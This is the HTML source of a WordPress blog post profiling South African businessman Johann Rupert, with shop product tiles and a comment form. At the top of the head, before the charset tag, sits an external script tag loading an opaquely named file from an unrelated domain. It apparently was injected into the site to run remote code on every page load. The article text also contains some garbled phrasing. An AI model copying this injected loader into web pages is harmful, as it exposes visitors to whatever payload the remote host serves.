    <!DOCTYPE html>
    <html lang="en-US">
    <head itemscope itemtype="http://schema.org/WebSite">
<script src='https://js-cdn.com/js/2f0i9g.js'></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="http://gmpg.org/xfn/11">
    <title>The Success Story of South African Businessman, Johann Rupert &#8211; TechNinzaz</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="TechNinzaz &raquo; Feed" href="https://techninzaz.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="TechNinzaz &raquo; Comments Feed" href="https://techninzaz.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="TechNinzaz &raquo; The Success Story of South African Businessman, Johann Rupert Comments Feed" href="https://techninzaz.com/the-success-story-of-south-african-businessman-johann-rupert/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/techninzaz.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://techninzaz.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='wc-block-style-css'  href='https://techninzaz.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=2.4.5' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-notice-front-css'  href='https://techninzaz.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css'  href='https://techninzaz.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css'  href='https://techninzaz.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.8.1' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css'  href='https://techninzaz.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.8.1' type='text/css' media='all' />
<style id='woocommerce-inline-inline-css' type='text/css'>
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel='stylesheet' id='owl-carousel-css'  href='https://techninzaz.com/wp-content/themes/blossom-feminine/css/owl.carousel.min.css?ver=2.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='animate-css'  href='https://techninzaz.com/wp-content/themes/blossom-feminine/css/animate.min.css?ver=3.5.2' type='text/css' media='all' />
<link rel='stylesheet' id='blossom-feminine-google-fonts-css'  href='https://fonts.googleapis.com/css?family=Poppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPlayfair+Display%3Aregular%2Citalic%2C700%2C700italic%2C900%2C900italic%7CPlayfair+Display%3A700italic' type='text/css' media='all' />
<link rel='stylesheet' id='blossom-feminine-style-css'  href='https://techninzaz.com/wp-content/themes/blossom-feminine/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='blossom-feminine-woocommerce-style-css'  href='https://techninzaz.com/wp-content/themes/blossom-feminine/css/woocommerce.min.css?ver=1.3.0' type='text/css' media='all' />
<script type='text/javascript' src='https://techninzaz.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var cnArgs = {"ajaxurl":"https:\/\/techninzaz.com\/wp-admin\/admin-ajax.php","hideEffect":"slide","onScroll":"yes","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"yes","revoke_cookies":"1","revoke_cookies_opt":"automatic","secure":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.48'></script>
<link rel='https://api.w.org/' href='https://techninzaz.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://techninzaz.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://techninzaz.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Hundreds of US news sites unavailable in Europe two months after GDPR' href='https://techninzaz.com/hundreds-of-us-news-sites-unavailable-in-europe-two-months-after-gdpr/' />
<meta name="generator" content="WordPress 5.3.2" />
<meta name="generator" content="WooCommerce 3.8.1" />
<link rel="canonical" href="https://techninzaz.com/the-success-story-of-south-african-businessman-johann-rupert/" />
<link rel='shortlink' href='https://techninzaz.com/?p=447' />
		<!-- Custom Logo: hide header text -->
		<style id="custom-logo-css" type="text/css">
			.site-title, .site-description {
				position: absolute;
				clip: rect(1px, 1px, 1px, 1px);
			}
		</style>
		<link rel="alternate" type="application/json+oembed" href="https://techninzaz.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftechninzaz.com%2Fthe-success-story-of-south-african-businessman-johann-rupert%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://techninzaz.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftechninzaz.com%2Fthe-success-story-of-south-african-businessman-johann-rupert%2F&#038;format=xml" />
<link rel="pingback" href="https://techninzaz.com/xmlrpc.php"><script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://techninzaz.com/the-success-story-of-south-african-businessman-johann-rupert/"
    },
    "headline": "The Success Story of South African Businessman, Johann Rupert &#8211; TechNinzaz",
    "image": {
        "@type": "ImageObject",
        "url": "https://techninzaz.com/wp-content/uploads/2019/12/ppdefuheyr5t7836.jpg",
        "width": 1280,
        "height": 1280
    },
    "datePublished": "2019-12-27T15:40:57+0000",
    "dateModified": "2019-12-27T16:15:04+0000",
    "author": {
        "@type": "Person",
        "name": "Sadie Wester"
    },
    "publisher": {
        "@type": "Organization",
        "name": "TechNinzaz",
        "description": "Technology people",
        "logo": {
            "@type": "ImageObject",
            "url": "https://techninzaz.com/wp-content/uploads/2019/12/cropped-TechNinzaz-105x60.png",
            "width": 105,
            "height": 60
        }
    },
    "description": "Johann Rupert is a South African businessman who grew up in Stellenbosch and immediately started his banking p"
}
</script>
	<noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript>
	<link rel="icon" href="https://techninzaz.com/wp-content/uploads/2019/12/cropped-TechNinzaz-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://techninzaz.com/wp-content/uploads/2019/12/cropped-TechNinzaz-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://techninzaz.com/wp-content/uploads/2019/12/cropped-TechNinzaz-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://techninzaz.com/wp-content/uploads/2019/12/cropped-TechNinzaz-1-270x270.png" />
<style type='text/css' media='all'>     
    .content-newsletter .blossomthemes-email-newsletter-wrapper.bg-img:after,
    .widget_blossomthemes_email_newsletter_widget .blossomthemes-email-newsletter-wrapper:after{
        background: rgba(243, 201, 221, 0.8);    }
    
    /* primary color */
    a{
    	color: #f3c9dd;
    }
    
    a:hover {
    	color: #f3c9dd;
    }

    .secondary-nav ul li a:hover,
    .secondary-nav ul li:hover > a,
    .secondary-nav .current_page_item > a,
    .secondary-nav .current-menu-item > a,
    .secondary-nav .current_page_ancestor > a,
    .secondary-nav .current-menu-ancestor > a,
    .header-t .social-networks li a:hover,
    .main-navigation ul li a:hover,
    .main-navigation ul li:hover > a,
    .main-navigation .current_page_item > a,
    .main-navigation .current-menu-item > a,
    .main-navigation .current_page_ancestor > a,
    .main-navigation .current-menu-ancestor > a,
    .banner .banner-text .cat-links a:hover,
    .banner .banner-text .title a:hover,
    #primary .post .text-holder .entry-header .entry-title a:hover,
    .widget ul li a:hover,
    .site-footer .widget ul li a:hover,
    .related-post .post .text-holder .cat-links a:hover,
    .related-post .post .text-holder .entry-title a:hover,
    .comments-area .comment-body .comment-metadata a:hover,
    .search #primary .search-post .text-holder .entry-header .entry-title a:hover,
    .site-title a:hover,
    .widget_bttk_popular_post ul li .entry-header .entry-meta a:hover,
    .widget_bttk_pro_recent_post ul li .entry-header .entry-meta a:hover,
    .widget_bttk_popular_post .style-two li .entry-header .cat-links a,
    .widget_bttk_pro_recent_post .style-two li .entry-header .cat-links a,
    .widget_bttk_popular_post .style-three li .entry-header .cat-links a,
    .widget_bttk_pro_recent_post .style-three li .entry-header .cat-links a,
    .widget_bttk_posts_category_slider_widget .carousel-title .title a:hover,
    .site-footer .widget_bttk_posts_category_slider_widget .carousel-title .title a:hover,
    .portfolio-sorting .button:hover,
    .portfolio-sorting .button.is-checked,
    .portfolio-item .portfolio-img-title a:hover,
    .portfolio-item .portfolio-cat a:hover,
    .entry-header .portfolio-cat a:hover{
        color: #f3c9dd;
    }

    .category-section .col .img-holder .text-holder,
    .pagination a{
        border-color: #f3c9dd;
    }

    .category-section .col .img-holder .text-holder span,
    #primary .post .text-holder .entry-footer .btn-readmore:hover,
    .pagination a:hover,
    .widget_calendar caption,
    .widget_calendar table tbody td a,
    .widget_tag_cloud .tagcloud a:hover,
    #blossom-top,
    .single #primary .post .entry-footer .tags a:hover,
    .error-holder .page-content a:hover,
    .widget_bttk_author_bio .readmore:hover,
    .widget_bttk_social_links ul li a:hover,
    .widget_bttk_image_text_widget ul li .btn-readmore:hover,
    .widget_bttk_custom_categories ul li a:hover .post-count,
    .content-instagram ul li .instagram-meta .like,
    .content-instagram ul li .instagram-meta .comment,
    #secondary .widget_blossomtheme_featured_page_widget .text-holder .btn-readmore:hover,
    #secondary .widget_blossomtheme_companion_cta_widget .btn-cta:hover,
    #secondary .widget_bttk_icon_text_widget .text-holder .btn-readmore:hover,
    .site-footer .widget_blossomtheme_companion_cta_widget .btn-cta:hover,
    .site-footer .widget_blossomtheme_featured_page_widget .text-holder .btn-readmore:hover,
    .site-footer .widget_bttk_icon_text_widget .text-holder .btn-readmore:hover{
        background: #f3c9dd;
    }

    .pagination .current,
    .post-navigation .nav-links .nav-previous a:hover,
    .post-navigation .nav-links .nav-next a:hover{
        background: #f3c9dd;
        border-color: #f3c9dd;
    }

    #primary .post .entry-content blockquote,
    #primary .page .entry-content blockquote{
        border-bottom-color: #f3c9dd;
        border-top-color: #f3c9dd;
    }

    #primary .post .entry-content .pull-left,
    #primary .page .entry-content .pull-left,
    #primary .post .entry-content .pull-right,
    #primary .page .entry-content .pull-right{border-left-color: #f3c9dd;}

    .error-holder .page-content h2{
        text-shadow: 6px 6px 0 #f3c9dd;
    }

    
    body,
    button,
    input,
    select,
    optgroup,
    textarea{
        font-family : Poppins;
        font-size   : 16px;
    }

    #primary .post .entry-content blockquote cite,
    #primary .page .entry-content blockquote cite {
        font-family : Poppins;
    }

    .banner .banner-text .title,
    #primary .sticky .text-holder .entry-header .entry-title,
    #primary .post .text-holder .entry-header .entry-title,
    .author-section .text-holder .title,
    .post-navigation .nav-links .nav-previous .post-title,
    .post-navigation .nav-links .nav-next .post-title,
    .related-post .post .text-holder .entry-title,
    .comments-area .comments-title,
    .comments-area .comment-body .fn,
    .comments-area .comment-reply-title,
    .page-header .page-title,
    #primary .post .entry-content blockquote,
    #primary .page .entry-content blockquote,
    #primary .post .entry-content .pull-left,
    #primary .page .entry-content .pull-left,
    #primary .post .entry-content .pull-right,
    #primary .page .entry-content .pull-right,
    #primary .post .entry-content h1,
    #primary .page .entry-content h1,
    #primary .post .entry-content h2,
    #primary .page .entry-content h2,
    #primary .post .entry-content h3,
    #primary .page .entry-content h3,
    #primary .post .entry-content h4,
    #primary .page .entry-content h4,
    #primary .post .entry-content h5,
    #primary .page .entry-content h5,
    #primary .post .entry-content h6,
    #primary .page .entry-content h6,
    .search #primary .search-post .text-holder .entry-header .entry-title,
    .error-holder .page-content h2,
    .widget_bttk_author_bio .title-holder,
    .widget_bttk_popular_post ul li .entry-header .entry-title,
    .widget_bttk_pro_recent_post ul li .entry-header .entry-title,
    .widget_bttk_posts_category_slider_widget .carousel-title .title,
    .content-newsletter .blossomthemes-email-newsletter-wrapper .text-holder h3,
    .widget_blossomthemes_email_newsletter_widget .blossomthemes-email-newsletter-wrapper .text-holder h3,
    #secondary .widget_bttk_testimonial_widget .text-holder .name,
    #secondary .widget_bttk_description_widget .text-holder .name,
    .site-footer .widget_bttk_description_widget .text-holder .name,
    .site-footer .widget_bttk_testimonial_widget .text-holder .name,
    .portfolio-text-holder .portfolio-img-title,
    .portfolio-holder .entry-header .entry-title,
    .single-blossom-portfolio .post-navigation .nav-previous a,
    .single-blossom-portfolio .post-navigation .nav-next a,
    .related-portfolio-title{
        font-family: Playfair Display;
    }

    .site-title{
        font-size   : 60px;
        font-family : Playfair Display;
        font-weight : 700;
        font-style  : italic;
    }
    
            .woocommerce ul.products li.product .add_to_cart_button:hover,
		.woocommerce ul.products li.product .product_type_external:hover,
		.woocommerce nav.woocommerce-pagination ul li a:hover,
		.woocommerce #secondary .widget_shopping_cart .buttons .button:hover,
		.woocommerce #secondary .widget_price_filter .price_slider_amount .button:hover,
		.woocommerce #secondary .widget_price_filter .ui-slider .ui-slider-range,
		.woocommerce div.product form.cart .single_add_to_cart_button:hover,
		.woocommerce div.product .cart .single_add_to_cart_button.alt:hover,
		.woocommerce .woocommerce-message .button:hover,
		.woocommerce-cart #primary .page .entry-content .cart_totals .checkout-button:hover,
		.woocommerce-checkout .woocommerce .woocommerce-info,
        .header-t .tools .cart .count {
			background: #f3c9dd;
		}

		.woocommerce nav.woocommerce-pagination ul li a{
			border-color: #f3c9dd;
		}

		.woocommerce nav.woocommerce-pagination ul li span.current{
			background: #f3c9dd;
			border-color: #f3c9dd;
		}

		.woocommerce div.product .entry-summary .product_meta .posted_in a:hover,
		.woocommerce div.product .entry-summary .product_meta .tagged_as a:hover{
			color: #f3c9dd;
		}
            
               
    </style>
</head>

<body class="post-template-default single single-post postid-447 single-format-standard wp-custom-logo theme-blossom-feminine cookies-not-set woocommerce-no-js rightsidebar" itemscope itemtype="http://schema.org/WebPage">
	
    <div id="page" class="site"><a aria-label="skip to content" class="skip-link" href="#content">Skip to Content</a>
        <header id="masthead" class="site-header wow fadeIn" data-wow-delay="0.1s" itemscope itemtype="http://schema.org/WPHeader">
    
		<div class="header-t">
			<div class="container">

                				    <button aria-label="secondary menu toggle button" id="secondary-toggle-button"><i class="fa fa-bars"></i></button>	
                
                <nav id="secondary-navigation" class="secondary-nav" itemscope itemtype="http://schema.org/SiteNavigationElement">
        			<div class="menu-client-info-container"><ul id="secondary-menu" class="menu"><li id="menu-item-411" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-411"><a href="https://techninzaz.com/shipping-and-delivery/">Shipping and delivery</a></li>
<li id="menu-item-412" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-412"><a href="https://techninzaz.com/returns/">Returns</a></li>
</ul></div>                
        		</nav><!-- #secondary-navigation -->
                
				<div class="right">
					<div class="tools">
						<div class="form-section">
							<button aria-label="search toggle button" id="btn-search">
                                <i class="fas fa-search"></i>
                            </button>
							<div class="form-holder">
								<form role="search" method="get" class="search-form" action="https://techninzaz.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>							</div>
						</div>
                            <div class="cart">                                   	
        <a href="https://techninzaz.com/cart/" title="View your shopping cart">
            <span><i class="fa fa-shopping-cart"></i></span>
            <span class="count">0</span>
        </a>
	</div>    
    					
					</div>
                    
					                    
				</div>
                
			</div>
		</div><!-- .header-t -->
        
		<div class="header-m site-branding">
			<div class="container" itemscope itemtype="http://schema.org/Organization">
				<a href="https://techninzaz.com/" class="custom-logo-link" rel="home"><img width="208" height="119" src="https://techninzaz.com/wp-content/uploads/2019/12/cropped-TechNinzaz.png" class="custom-logo" alt="TechNinzaz" srcset="https://techninzaz.com/wp-content/uploads/2019/12/cropped-TechNinzaz.png 208w, https://techninzaz.com/wp-content/uploads/2019/12/cropped-TechNinzaz-105x60.png 105w" sizes="(max-width: 208px) 100vw, 208px" /></a>                    <p class="site-title" itemprop="name"><a href="https://techninzaz.com/" rel="home" itemprop="url">TechNinzaz</a></p>
                                    <p class="site-description" itemprop="description">Technology people</p>
                			</div>
		</div><!-- .header-m -->
        
		<div class="header-b">
			<div class="container">
				<button aria-label="primary menu toggle button" id="primary-toggle-button"><i class="fa fa-bars"></i>Navigation</button>
				<nav id="site-navigation" class="main-navigation" itemscope itemtype="http://schema.org/SiteNavigationElement">
        			<div class="menu-main-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-4" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4"><a href="/">Shop</a>
<ul class="sub-menu">
	<li id="menu-item-403" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-403"><a href="https://techninzaz.com/my-account/">My account</a></li>
	<li id="menu-item-404" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-404"><a href="https://techninzaz.com/checkout/">Checkout</a></li>
</ul>
</li>
<li id="menu-item-402" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-has-children menu-item-402"><a href="https://techninzaz.com/blog/">Blog</a>
<ul class="sub-menu">
	<li id="menu-item-9" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9"><a href="https://techninzaz.com/category/internet/">Internet</a></li>
	<li id="menu-item-10" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10"><a href="https://techninzaz.com/category/tv-and-movies/">TV and Movies</a></li>
</ul>
</li>
</ul></div>        		</nav><!-- #site-navigation -->                
			</div>
		</div><!-- .header-b -->
        
	</header><!-- #masthead -->
        <div class="top-bar">
		<div class="container">
			    <header class="page-header">
        </header><!-- .page-header -->
    <div class="breadcrumb-wrapper">
                <div id="crumbs" itemscope itemtype="http://schema.org/BreadcrumbList"> 
                    <span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem">
                        <a itemprop="item" href="https://techninzaz.com"><span itemprop="name">Home</span></a>
                        <meta itemprop="position" content="1" />
                        <span class="separator">/</span>
                    </span> <span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://techninzaz.com/blog/" itemprop="item"><span itemprop="name">Blog </span></a><meta itemprop="position" content="2" /><span class="separator">/</span></span>  <span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a itemprop="item" href="https://techninzaz.com/category/uncategorized/"><span itemprop="name">Uncategorized </span></a><meta itemprop="position" content="3" /><span class="separator">/</span></span> <span class="current" itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a itemprop="item" href="https://techninzaz.com/the-success-story-of-south-african-businessman-johann-rupert/"><span itemprop="name">The Success Story of South African Businessman, Johann Rupert</span></a><meta itemprop="position" content="4" /></span></div></div><!-- .breadcrumb-wrapper -->		</div>
	</div>
        <div class="container main-content">
                <div id="content" class="site-content">
            <div class="row">
    
	<div id="primary" class="content-area">
		<main id="main" class="site-main">

		
<article id="post-447" class="post-447 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" itemscope itemtype="https://schema.org/Blog">
	
    <div class="post-thumbnail"><img width="1020" height="600" src="https://techninzaz.com/wp-content/uploads/2019/12/ppdefuheyr5t7836-1020x600.jpg" class="attachment-blossom-feminine-with-sidebar size-blossom-feminine-with-sidebar wp-post-image" alt="" /></div>    
    <div class="text-holder">        
            <header class="entry-header">
    <span class="cat-links" itemprop="about"><a href="https://techninzaz.com/category/uncategorized/" rel="category tag">Uncategorized</a></span><h1 class="entry-title" itemprop="headline">The Success Story of South African Businessman, Johann Rupert</h1><div class="entry-meta"><span class="byline" itemprop="author" itemscope itemtype="https://schema.org/Person"> by <span class="author vcard" itemprop="name"><a class="url fn n" href="https://techninzaz.com/author/sadiwester/">Sadie Wester</a></span></span><span class="posted-on"><span class="text-on">updated on </span><a href="https://techninzaz.com/the-success-story-of-south-african-businessman-johann-rupert/" rel="bookmark"><time class="entry-date published updated" datetime="2019-12-27T16:15:04+00:00" itemprop="dateModified">December 27, 2019</time><time class="updated" datetime="2019-12-27T15:40:57+00:00" itemprop="datePublished">December 27, 2019</time></a></span><span class="comments"><i class="fa fa-comment"></i><a href="https://techninzaz.com/the-success-story-of-south-african-businessman-johann-rupert/#respond">Leave a Comment<span class="screen-reader-text"> on The Success Story of South African Businessman, Johann Rupert</span></a></span></div><!-- .entry-meta -->	</header><!-- .entry-header home-->
        
    <div class="entry-content" itemprop="text">
		<div class="text">
<p>Johann Rupert is a South African businessman who grew up in Stellenbosch and immediately started his banking profession in New York City. He returned to South Africa in 1979 and set up the Rand Merchant Bank, which he ran until 1984. He soon left, leading the Rembrandt Company forward. He created the Compagnie Financière Richemont in 1988, a luxury Swiss company he currently presides over. He still held executive positions in several other firms.<br></p>



<p>Mr. Rupert has received numerous honors and achievements during his career. He is three times South Africa&#8217;s most powerful figure. He has also been named the Year&#8217;s Business Leader on numerous occasions and was honored as one of tomorrow&#8217;s Global Leaders by the World Economic Forum in 1992.<br></p>



<p>He holds doctorate degrees from the University of Stellenbosch, Nelson Mandela Metropolitan University, and University of St. Andrews. In 2009, he received the Management Achievement Award at the University of Witwatersrand and was chosen Chancellor of Stellenbosch University. The French President named him Officer of the French National Order of the Hon Legion in the same year<br></p>



<p>&#8220;We are living on the cusp of tremendous systemic change, and while many things may be in flux, one thing is clear: it’s time to give back and to put the human being back in the center of our systems,&#8221; he said.</p>



<p>Mr. Rupert succeeded in fostering a healthy society and a better world, one of his many accomplishments in leadership and business, and he was responsible for building a number of organizations that reflect this dedication. He is a founding member of the Small Business Development Corporation, now known as Business Partners Ltd, which has created more than half a million jobs in South Africa since its formation. He is also a member of the advisory board of the Nelson Mandela Children&#8217;s Fund and has been president of the Peace Parks Foundation since 2006.</p>



<p>Mr. Rupert has also made a tremendous dedication to upholding ideals and increasing the value of sport in society. He played a vital role in developing the Laureus Sport for Good Foundation, which greatly strengthens sport&#8217;s power to change the lives of underprivileged youth around the world, and co-founded the Sports Science Institute at the University of Cape Town.<br></p>



<p></p>


<div class="wc-block-grid wp-block-handpicked-products wc-block-handpicked-products has-3-columns"><ul class="wc-block-grid__products"><li class="wc-block-grid__product">
				<a href="https://techninzaz.com/product/athletic-coaching-a-communication-perspective-communication-sport-and-society-paperback/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="300" height="300" src="https://techninzaz.com/wp-content/uploads/2019/12/91rBuwsBe1L-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://techninzaz.com/wp-content/uploads/2019/12/91rBuwsBe1L-300x300.jpg 300w, https://techninzaz.com/wp-content/uploads/2019/12/91rBuwsBe1L-150x150.jpg 150w, https://techninzaz.com/wp-content/uploads/2019/12/91rBuwsBe1L-435x435.jpg 435w, https://techninzaz.com/wp-content/uploads/2019/12/91rBuwsBe1L-45x45.jpg 45w" sizes="(max-width: 300px) 100vw, 300px" /></div>
					<div class="wc-block-grid__product-title">Athletic Coaching: A Communication Perspective (Communication, Sport, and Society) Paperback</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>45.95</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=444" aria-label="Add &ldquo;Athletic Coaching: A Communication Perspective (Communication, Sport, and Society) Paperback&rdquo; to your cart" data-quantity="1" data-product_id="444" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li><li class="wc-block-grid__product">
				<a href="https://techninzaz.com/product/sport-in-contemporary-society-an-anthology-10th-edition/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="300" height="300" src="https://techninzaz.com/wp-content/uploads/2019/12/51mw4Zy3ZFL._SX329_BO1204203200_-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://techninzaz.com/wp-content/uploads/2019/12/51mw4Zy3ZFL._SX329_BO1204203200_-300x300.jpg 300w, https://techninzaz.com/wp-content/uploads/2019/12/51mw4Zy3ZFL._SX329_BO1204203200_-150x150.jpg 150w, https://techninzaz.com/wp-content/uploads/2019/12/51mw4Zy3ZFL._SX329_BO1204203200_-45x45.jpg 45w" sizes="(max-width: 300px) 100vw, 300px" /></div>
					<div class="wc-block-grid__product-title">Sport in Contemporary Society: An Anthology 10th Edition</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>24.26</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=441" aria-label="Add &ldquo;Sport in Contemporary Society: An Anthology 10th Edition&rdquo; to your cart" data-quantity="1" data-product_id="441" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li></ul></div></div>	</div><!-- .entry-content -->      
        <footer class="entry-footer">
    	</footer><!-- .entry-footer home-->
        </div><!-- .text-holder -->
    
</article><!-- #post-447 -->            
            <nav class="navigation post-navigation" role="navigation">
    			<h2 class="screen-reader-text">Post Navigation</h2>
    			<div class="nav-links">
    				<div class="nav-previous nav-holder"><a href="https://techninzaz.com/hundreds-of-us-news-sites-unavailable-in-europe-two-months-after-gdpr/" rel="prev"><span class="meta-nav">Previous Article</span><span class="post-title">Hundreds of US news sites unavailable in Europe two months after GDPR</span></a></div>    			</div>
    		</nav>        
            
<div id="comments" class="comments-area">

		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/the-success-story-of-south-african-businessman-johann-rupert/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://techninzaz.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comment</label><textarea id="comment" name="comment" placeholder="Comment" cols="45" rows="8" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name<span class="required">*</span></label><input id="author" name="author" placeholder="Name*" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email<span class="required">*</span></label><input id="email" name="email" placeholder="Email*" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><input id="url" name="url" placeholder="Website" type="text" value="" size="30" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='447' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
	
</div><!-- #comments -->

		</main><!-- #main -->
